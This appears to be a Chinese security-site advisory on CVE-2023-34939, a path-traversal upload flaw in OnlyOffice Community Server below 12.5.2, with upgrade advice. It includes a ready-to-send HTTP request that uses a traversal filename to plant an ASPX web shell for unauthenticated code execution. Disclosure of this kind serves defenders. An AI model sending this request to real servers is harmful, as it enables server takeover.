OnlyOffice Community Server 文件上传漏洞

admin 2024年9月23日16:25:14OnlyOffice Community Server 文件上传漏洞已关闭评论45 views字数 1126阅读3分45秒阅读模式
  • 漏洞编号:CVE-2023-34939
  • 漏洞类型:路径遍历
  • 漏洞等级:严重
  • 发布时间:2023-07-03

漏洞描述:

Onlyoffice 是一款全能的开源写作办公套件

2023年6月26日,Onlyoffice发布Onlyoffice Community Server 12.5.2版本,新版本修复了一处路径遍历漏洞,漏洞编号:CVE-2023-34939,漏洞危害等级:严重。

当ONLYOFFICE Community Server的论坛存在讨论话题时,未经授权的攻击者可上传任意文件并导致任意代码执行,从而控制服务器。

影响版本:

Onlyoffice Community Server<12.5.2

修复建议

官方已发布新版本中修复上述漏洞,受影响用户请尽快升级到安全版本。
漏洞修复版本:
Onlyoffice Community Server >=12.5.2
下载链接:
https://github.com/firsov/onlyoffice

POC

POST /UploadProgress.ashx?submit=ASC.Web.UserControls.Forum.ForumAttachmentUploadHanler,ASC.Web.Community&SettingsID=11111111-1111-1111-1111-111111111111&ThreadID=3&UserID=11111111-1111-1111-1111-111111111110 HTTP/1.1
Host: REDACTED
Content-Length: 121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123

------WebKitFormBoundary123
Content-Disposition: form-data; name="files[]"; filename="../../../../../../../../../../../../../WebStudio/2023-34939.aspx"
Content-Type: application/asp

ASPX SHELL
------WebKitFormBoundary123--

参考链接:

https://github.com/ONLYOFFICE/CommunityServer/blob/master/CHANGELOG.md#version-1252
https://github.com/firsov/onlyoffice
https://github.com/firsov/onlyoffice/blob/main/CVE-2023-34939-PoC.md

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日16:25:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OnlyOffice Community Server 文件上传漏洞https://cn-sec.com/archives/3198268.html